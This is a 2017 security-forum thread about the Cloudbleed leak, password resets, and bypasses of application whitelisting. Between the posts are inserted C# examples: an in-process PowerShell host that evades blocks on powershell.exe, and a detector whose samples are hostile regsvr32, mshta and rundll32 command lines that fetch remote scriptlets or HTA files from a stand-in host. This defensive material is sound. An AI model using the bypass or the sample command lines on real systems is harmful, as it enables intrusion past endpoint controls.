|
My inbox volume was fairly high this morning with staff asking which passwords they should change. I'm probably three emails away from replying with because I'm not psychic and I don't actually know or care which sites you have accounts on.
|
# ? Feb 24, 2017 17:22 |
|
Within my organisation, we use an application white-listing product (Appsense Application Manager) on all Windows endpoints. We only allow pre-approved applications and block scripting engines like cscript.exe, powershell.exe etc. We do not allow executables to run from anywhere in the user's profile, network drives etcetera. We haven't had a single malware infection (well, as far as we know) since implementing white-listing, and are generally pretty pleased with it. We recently had a sales meeting with a security vendor. They told us that app-whitelisting technologies were now ineffective, because new toolkits such as 'PowerShell Empire' can execute on a system without needing an actual .exe file to be written to the file system and then executed somehow. I am trying to understand how accurate this statement is. I've read various bits about PowerShell Empire and the different staging methods, such as DLL injection, but they all seem to rely on powershell.exe or at least some sort of executable running at some point. Can someone help me understand this? My background is in general IT ops, so apologies if I have misunderstood anything.
|
# ? Feb 24, 2017 17:58 |
|
Telling people 'you should change every password you have' seems like a great way to make them go 'eh why bother' and not change anything.
|
# ? Feb 24, 2017 19:19 |
|
skull mask mcgee posted: I mean, it is Friday morning. This is a vodka day. Tuesdays are for whiskey.
|
# ? Feb 24, 2017 19:24 |
|
vOv posted: Telling people 'you should change every password you have' seems like a great way to make them go 'eh why bother' and not change anything.

So you would advise what? "here's a list of a million-plus domains. Figure out which ones you use" Seriously, everyone should be changing all their passwords and implementing 2FA on sites that support it. If they don't want to, that's on them.
|
# ? Feb 24, 2017 19:27 |
|
I think that "resetting all of your passwords" is overkill given the fact that the chance of this having been exploited in the past 6 months is low, the "good guys" found the issue, and CloudFlare have been working with search vendors to clear their relevant caches. I informed my users to reset their most sensitive accounts and to keep an eye on their bank statements, but until I see something that indicates this is being exploited it is more of a "reset your sensitive passwords when you have a moment" rather than "stop what you are doing and reset every password you have." Company-wise, we do not have any services that use CloudFlare that we are aware of, but obviously we are still researching that. [Edit: Like yeah, I get it, a full reset is the correct way of handling this. But back in the real world, the universe does not revolve around IT security. Add in the fact that theoretically speaking, some of the data that was leaked includes problematic info that isn't usernames and passwords that we can't clean up after, it is what it is.]
|
# ? Feb 24, 2017 19:32 |
|
*Eyes notebook with 28 pages of written down random passwords with trepidation*
|
# ? Feb 24, 2017 20:33 |
|
Internet Explorer posted: I think that "resetting all of your passwords" is overkill given the fact that the chance of this having been exploited in the past 6 months is low, the "good guys" found the issue, and CloudFlare have been working with search vendors to clear their relevant caches. I informed my users to reset their most sensitive accounts and to keep an eye on their bank statements, but until I see something that indicates this is being exploited it is more of a "reset your sensitive passwords when you have a moment" rather than "stop what you are doing and reset every password you have."

I definitely see what you're saying and mostly agree. I still think it's a good idea to encourage everyone to reset their passwords after this, if for no other reason than encouraging the practice. It's good to get people in the habit of being aware of what passwords they have where, and when the last time was they reset them. This is also a good chance to encourage two-factor. None of this addresses the fact that the biggest/worst part of this leak was the traffic compromise part, it's not like someone hacked into a password database. The sheer scope of this is awesome imo, this kind of incident turns my crank in the morning
|
# ? Feb 24, 2017 20:42 |
|
vOv posted: Telling people 'you should change every password you have' seems like a great way to make them go 'eh why bother' and not change anything.

"Change every password you have, starting with the most important ones, until you get bored"
|
# ? Feb 24, 2017 20:55 |
|
Cup Runneth Over posted: "Change every password you have, starting with the most important ones, until you get bored"

Yeah, basically. I think it's reasonable to reset maybe your 5 most important passwords (bank, e-mail, secret ADTRW account) but I have maybe 40 passwords that'd be affected by this and some of them I'd have to re-type on my phone and I don't reuse passwords anyway. I don't want to spend literally an hour on this.
|
# ? Feb 24, 2017 21:00 |
|
Cup Runneth Over posted: "Change every password you have, starting with the most important ones, until you get bored"

0 passwords later "OK I guess I'm good to go!"
|
# ? Feb 24, 2017 21:10 |
|
Volmarias posted: 0 passwords later

If users are determined to be stupid, what can you do to prevent them from compromising themselves? They will just tell someone their password when emailed about it anyway.
|
# ? Feb 24, 2017 21:15 |
|
Authy is on the list. I use Authy but always via the Android app and not over HTTP. Do I need to regenerate my master key thingy again?
|
# ? Feb 24, 2017 21:31 |
|
Cup Runneth Over posted: If users are determined to be stupid, what can you do to prevent them from compromising themselves? They will just tell someone their password when emailed about it anyway.

Is it not stupid to stop when bored of the process, as you proposed? How far do you have to go in the list to be smart, if not to the end?

apropos man posted: Authy is on the list. I use Authy but always via the Android app and not over HTTP. Do I need to regenerate my master key thingy again?

Does the app not use HTTP?
|
# ? Feb 24, 2017 21:32 |
|
apropos man posted: Authy is on the list. I use Authy but always via the Android app and not over HTTP. Do I need to regenerate my master key thingy again?

I promise you the app also uses http/s
|
# ? Feb 24, 2017 21:33 |
|
Cool. Cheers folks.
|
# ? Feb 24, 2017 21:40 |
|
Subjunctive posted: Is it not stupid to stop when bored of the process, as you proposed? How far do you have to go in the list to be smart, if not to the end?

Fair enough. If you don't consider any of your accounts important enough to take action to protect them, that doesn't necessarily make you stupid.
|
# ? Feb 24, 2017 21:46 |
|
Question: because of Cloudbleed, do you guys foresee a lot of (or even any) companies doing forced password resets? As in a company kills everyone's password and forces them to do a password recovery? I think that this is more of a "our password hashes (or worse, plaintext) passwords were all leaked" scenario where that sort of sledgehammer approach would apply. Or once logged in the users would be encouraged or forced to change their passwords.
|
# ? Feb 24, 2017 22:39 |
|
Three-Phase posted: Question: because of Cloudbleed, do you guys foresee a lot of (or even any) companies doing forced password resets? As in a company kills everyone's password and forces them to do a password recovery?

I hope so.
|
# ? Feb 24, 2017 22:50 |
|
Three-Phase posted: Question: because of Cloudbleed, do you guys foresee a lot of (or even any) companies doing forced password resets? As in a company kills everyone's password and forces them to do a password recovery?

Agree with ^^^, I definitely hope this happens.
|
# ? Feb 24, 2017 22:53 |
|
gallop w/a boner posted: .

This will help: https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/

To summarize: at PowerShell's core is an implementation of the System.Management.Automation C# framework. By making a new C# exe that can access and run commands on that framework, you get a gimped version (no threading and slow as poo poo) of PowerShell, but PowerShell nevertheless. Then you hide this gimped PowerShell inside a whitelisted process and that is your stager.
|
# ? Feb 24, 2017 22:55 |
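The mechanism that summary describes, shown as an added example rather than code from the thread or from the linked Silent Break article: a small C# program that hosts the PowerShell engine in its own process, so powershell.exe is never started. The build command, the GAC path and the output layout are assumptions; the calls themselves are the public System.Management.Automation hosting API.

```csharp
// Added example, not from the thread or the linked article: host the
// PowerShell engine in-process so that powershell.exe never runs.
// Assumed build on a box with .NET Framework 4.x and Windows PowerShell 5.x
// (the GAC path below is the usual one but is an assumption; adjust if yours differs):
//   csc.exe /out:NotPowershellExe.exe /r:"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" NotPowershellExe.cs
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace NotPowershellExe
{
    public static class Program
    {
        // Runs PowerShell code inside the calling process. The image on disk is
        // whatever this was compiled to (or whatever it was injected into), so a
        // rule that only blocks powershell.exe / powershell_ise.exe never fires.
        public static Collection<PSObject> RunInProcess(string script)
        {
            using (Runspace rs = RunspaceFactory.CreateRunspace())
            {
                rs.Open();
                using (PowerShell ps = PowerShell.Create())
                {
                    ps.Runspace = rs;
                    ps.AddScript(script);
                    Collection<PSObject> results = ps.Invoke();
                    // Non-terminating engine errors land in the error stream, not in an exception.
                    foreach (ErrorRecord err in ps.Streams.Error)
                        Console.Error.WriteLine("ERROR: " + err);
                    return results;
                }
            }
        }

        public static void Main()
        {
            // What the engine reports about itself:
            //  HostProcess   - this exe, not powershell.exe
            //  LanguageMode  - ConstrainedLanguage if an AppLocker/WDAC policy is enforced
            //                  (PowerShell 5+ applies it in the engine, so a custom host gets it too)
            //  EngineDll     - the file a module-load detection (Sysmon event 7) would see
            const string script = @"
                [pscustomobject]@{
                    HostProcess   = (Get-Process -Id $PID).ProcessName
                    EngineVersion = $PSVersionTable.PSVersion.ToString()
                    LanguageMode  = $ExecutionContext.SessionState.LanguageMode.ToString()
                    EngineDll     = [System.Management.Automation.PSObject].Assembly.Location
                }";

            foreach (PSObject obj in RunInProcess(script))
                foreach (PSPropertyInfo prop in obj.Properties)
                    Console.WriteLine("{0,-14} {1}", prop.Name, prop.Value);
        }
    }
}
```

The practical consequence for a whitelisting deployment: the thing to watch is not the image name but the engine. System.Management.Automation.dll being loaded by anything other than powershell.exe or powershell_ise.exe is the signal, script block logging (event 4104) still records what ran because the logging lives in the engine, and Constrained Language Mode is applied by the engine under an enforced AppLocker/WDAC policy. Both of the latter only hold for the 5.x engine: if .NET 3.5 and the v2 engine are still installed, a host can bind to that older engine, which has neither.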
|
Subjunctive posted: I hope so.

But do you expect it to happen?
|
# ? Feb 24, 2017 23:08 |
|
I highly doubt it unless we start seeing accounts being breached.
|
# ? Feb 24, 2017 23:17 |
|
Three-Phase posted: But do you expect it to happen?

Internet Explorer posted: I highly doubt it unless we start seeing accounts being breached.

Any responsible website would enforce a password reset on their users or at the very least advise them to do so.
|
# ? Feb 24, 2017 23:21 |
|
OSI bean dip posted: Any responsible website would enforce a password reset on their users or at the very least advise them to do so.

Can you post a running list of these responsible websites as they enforce password resets?
|
# ? Feb 24, 2017 23:42 |
|
Three-Phase posted: Question: because of Cloudbleed, do you guys foresee a lot of (or even any) companies doing forced password resets? As in a company kills everyone's password and forces them to do a password recovery?

If you use something like LastPass, it has a feature to automatically change the password on the services supporting it.
|
# ? Feb 24, 2017 23:46 |
|
Internet Explorer posted: Can you post a running list of these responsible websites as they enforce password resets?

No. I have better things to do. If someone feels like the risk isn't there to warrant a forced password reset, at the very least they should recommend it.
|
# ? Feb 25, 2017 00:41 |
|
sarehu posted: Don't roll your crypto and don't use Cloudflare either.

Also: Don't upload a pair of files with identical SHA-1 to a SVN repository, turns out this corrupts them.
|
# ? Feb 25, 2017 00:56 |
|
Kassad posted: Also: Don't upload a pair of files with identical SHA-1 to a SVN repository, turns out this corrupts them.
|
# ? Feb 25, 2017 01:25 |
|
gallop w/a boner posted: Within my organisation, we use an application white-listing product (Appsense Application Manager) on all Windows endpoints. We only allow pre-approved applications and block scripting engines like cscript.exe, powershell.exe etc. We do not allow executables to run from anywhere in the user's profile, network drives etcetera. We haven't had a single malware infection (well, as far as we know) since implementing white-listing, and are generally pretty pleased with it.

With app white listing and scripting disabled, you've hit all the low hanging fruit. Outside of remote exploitation, the goal should be to keep the user from infecting themselves. Look up mshta or .hta file attacks, there's a great article on abusing regsvr32 to load vbs from back in January-ish. Both attacks don't depend on using cscript or wscript. But again, these haven't been seen yet lately in the usual mass malware campaigns. Take care of the low hanging fruit and you're mostly set.
|
# ? Feb 25, 2017 01:49 |
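The regsvr32 and mshta cases mentioned in that reply both run script without ever touching cscript.exe or wscript.exe, so a whitelist that only blocks those two engines does not see them. As an added example (not from the thread or the article it mentions), here is triage logic over process-creation command lines that flags the shapes those techniques take; the sample command lines and the 198.51.100.7 address are constructed for the example.

```csharp
// Added example, not from the thread: triage process-creation command lines
// (4688 or Sysmon event 1) for regsvr32 / mshta / rundll32 script-host abuse.
// The samples and 198.51.100.7 are constructed; nothing here is a real capture.
using System;
using System.Collections.Generic;
using System.Text.RegularExpressions;

public sealed class Finding
{
    public string Image;
    public string Reason;
    public string CommandLine;
}

public static class LolbinTriage
{
    private sealed class Rule
    {
        public string Image;
        public Regex Pattern;
        public string Reason;
        public Rule(string image, string pattern, string reason)
        {
            Image = image;
            Pattern = new Regex(pattern, RegexOptions.IgnoreCase);
            Reason = reason;
        }
    }

    private static readonly Rule[] Rules =
    {
        new Rule("regsvr32.exe", @"/i:\s*(https?:|\\\\)",
            "regsvr32 /i: pointed at a URL/UNC path: a scriptlet (.sct) is fetched and run through scrobj.dll"),
        new Rule("regsvr32.exe", @"\bscrobj\.dll\b",
            "regsvr32 registering scrobj.dll: COM scriptlet host, no cscript/wscript involved"),
        new Rule("mshta.exe", @"(https?:|\\\\|\.hta\b|javascript:|vbscript:)",
            "mshta running an HTA or an inline script: URL; HTAs are not covered by a cscript/wscript block"),
        new Rule("rundll32.exe", @"(javascript:|vbscript:)",
            "rundll32 with a script: URL evaluates script through mshtml"),
    };

    // First token of the command line, quoted or not, reduced to its file name so
    // both "mshta.exe" and a full path match the same rule.
    public static string ImageOf(string commandLine)
    {
        string s = commandLine.TrimStart();
        string first;
        if (s.StartsWith("\""))
        {
            int end = s.IndexOf('"', 1);
            first = end > 0 ? s.Substring(1, end - 1) : s.Substring(1);
        }
        else
        {
            int end = s.IndexOf(' ');
            first = end > 0 ? s.Substring(0, end) : s;
        }
        int slash = first.LastIndexOfAny(new[] { '\\', '/' });
        return (slash >= 0 ? first.Substring(slash + 1) : first).ToLowerInvariant();
    }

    public static List<Finding> Triage(string commandLine)
    {
        var findings = new List<Finding>();
        string image = ImageOf(commandLine);
        foreach (Rule r in Rules)
            if (r.Image == image && r.Pattern.IsMatch(commandLine))
                findings.Add(new Finding { Image = image, Reason = r.Reason, CommandLine = commandLine });
        return findings;
    }

    public static void Main()
    {
        // Constructed samples. The last two are benign uses and must not be flagged.
        string[] samples =
        {
            @"C:\Windows\System32\regsvr32.exe /s /n /u /i:http://198.51.100.7/update.sct scrobj.dll",
            @"""C:\Windows\System32\mshta.exe"" http://198.51.100.7/invoice.hta",
            @"mshta.exe javascript:a=new%20ActiveXObject(""WScript.Shell"");a.Run(""calc"");close();",
            @"rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();",
            @"C:\Windows\System32\regsvr32.exe /s ""C:\Program Files\Vendor\vendor.dll""",
            @"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL",
        };
        foreach (string cmd in samples)
        {
            List<Finding> hits = Triage(cmd);
            Console.WriteLine((hits.Count == 0 ? "ok    " : "ALERT ") + cmd);
            foreach (Finding f in hits)
                Console.WriteLine("      " + f.Reason);
        }
    }
}
```

Matching on the image name is deliberately the weak link here: a renamed copy of regsvr32.exe walks straight past it, so in a real pipeline key the rule on the binary's OriginalFileName or hash (Sysmon records both) rather than on the path, and treat the command-line pattern as the second half of the match.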
|
So I just spent the last couple of hours changing passwords due to cloudbleed. I even changed some that weren't on the vulnerable list just because. I noticed that ebay have disabled copy and paste in the browser, which is more likely to force people to choose a simple password over a random, complicated one that can be generated and pasted by keepass or whatever. Great thinking, ebay.
|
# ? Feb 25, 2017 09:10 |
|
apropos man posted: I noticed that ebay have disabled copy and paste in the browser

Have they? I was just able to log into ebay by pasting the password, with Chrome on Win10x64

edit: it seems that ublock origin is blocking the .js Ebay use in this case

Mr Chips fucked around with this message at 09:30 on Feb 25, 2017
|
# ? Feb 25, 2017 09:27 |
|
Mr Chips posted: Have they? I was just able to log into ebay by pasting the password, with Chrome on Win10x64

I can copy and paste to login. It's changing the password that requires typing every character. Even with Ublock disabled.
|
# ? Feb 25, 2017 09:34 |
|
https://github.com/weltan/cloudbleed-1password A smart guy made a nodejs app that checks 1Password URLs for vulnerable domains. Docker container available for those who don't want to install nodejs. (obviously do not export your passwords into a .csv, only export the URLs)
|
# ? Feb 25, 2017 09:51 |
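The same check, written out as an added example rather than the linked nodejs tool: it takes only the exported URLs, never the secrets, and matches them against an affected-domain list by exact host or subdomain, without letting a look-alike name such as notexample.com match example.com. Both lists below are constructed for the example; the real list is the one the thread refers to.

```csharp
// Added example, not the linked tool: check a password manager's exported URLs
// against a list of affected domains. Only URLs are read; no secrets are involved.
// Both lists in Main() are constructed for the example.
using System;
using System.Collections.Generic;

public static class AffectedDomainCheck
{
    // Hostname of a vault entry, lower-cased, without a trailing dot. Entries saved
    // without a scheme ("example.net", "mail.example.com/login") are accepted too;
    // entries that do not parse (blank URL fields in an export) return null.
    public static string HostOf(string entry)
    {
        string s = entry.Trim();
        if (s.Length == 0) return null;
        if (!s.Contains("://")) s = "https://" + s;
        Uri u;
        if (!Uri.TryCreate(s, UriKind.Absolute, out u) || u.HostNameType == UriHostNameType.Unknown)
            return null;
        return u.Host.ToLowerInvariant().TrimEnd('.');
    }

    // Maps each matching vault entry to the affected domain it falls under.
    // Walking up the labels (mail.example.com -> example.com -> com) keeps the
    // lookup O(labels) per entry even against a million-entry list, and the
    // label boundary is what stops "notexample.com" from matching "example.com".
    public static Dictionary<string, string> FindAffected(IEnumerable<string> vaultUrls, ICollection<string> affectedDomains)
    {
        var hits = new Dictionary<string, string>();
        foreach (string entry in vaultUrls)
        {
            string host = HostOf(entry);
            if (host == null) continue;
            string candidate = host;
            while (true)
            {
                if (affectedDomains.Contains(candidate)) { hits[entry] = candidate; break; }
                int dot = candidate.IndexOf('.');
                if (dot < 0) break;
                candidate = candidate.Substring(dot + 1);
            }
        }
        return hits;
    }

    public static void Main()
    {
        // Constructed affected-domain list (stand-in for the real one).
        var affected = new HashSet<string>(StringComparer.Ordinal) { "example.com", "example.net", "shop.example.org" };

        // Constructed URL export. Expected: the first, second, fifth and sixth entries hit.
        string[] vault =
        {
            "https://mail.example.com/login",   // subdomain of an affected domain: hit
            "example.net",                      // bare host, no scheme: hit
            "https://notexample.com/",          // look-alike: must not hit
            "https://example.org/",             // parent of an affected subdomain, not itself affected: no hit
            "https://shop.example.org/cart",    // exact affected host: hit
            "https://EXAMPLE.COM.",             // case and trailing dot normalised: hit
            "",                                 // blank URL field: skipped
        };

        foreach (KeyValuePair<string, string> kv in FindAffected(vault, affected))
            Console.WriteLine("{0,-35} -> {1}", kv.Key, kv.Value);
    }
}
```

A hit means the site was behind the affected infrastructure, not that your credentials were in the leaked data; the output is a triage list for deciding which resets to do first, which is the question the thread keeps circling.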
|
apropos man posted: I can copy and paste to login. It's changing the password that requires typing every character. Even with Ublock disabled.

Did you by chance tweet at twitter support about this because I literally just read a twitter thread about this exact issue.
|
# ? Feb 25, 2017 10:43 |
|
skull mask mcgee posted: Did you by chance tweet at twitter support about this because I literally just read a twitter thread about this exact issue.

Nope. I stopped tweeting a coupla years ago.
|
# ? Feb 26, 2017 02:58 |
|
It's so easy to gently caress up a copy/pasted password so making you type it makes a lot of sense.
|
# ? Feb 26, 2017 03:17 |
|
sarehu posted: It's so easy to gently caress up a copy/pasted password so making you type it makes a lot of sense.

Yeah. No. There is no reason for eBay to be blocking this other than idiocy. If there is a concern over someone mistakenly loving up the copy and paste of a password then why are you making users do that in the first place?
|
# ? Feb 26, 2017 03:32 |
|
sarehu posted: It's so easy to gently caress up a copy/pasted password so making you type it makes a lot of sense.

Lol this is a bad opinion. This explicitly blocks password managers, and if somebody fucks up a copy and paste there is a "forgot password" option. Blocking copy and paste is bad and dumb and doesn't do anything for security. In fact it actively hurts it.
|
# ? Feb 26, 2017 03:50 |
|
|
ratbert90 posted: Lol this is a bad opinion. This explicitly blocks password managers, and if somebody fucks up a copy and paste there is a "forgot password" option.

I feel like you missed a joke or something?
|
# ? Feb 26, 2017 03:55 |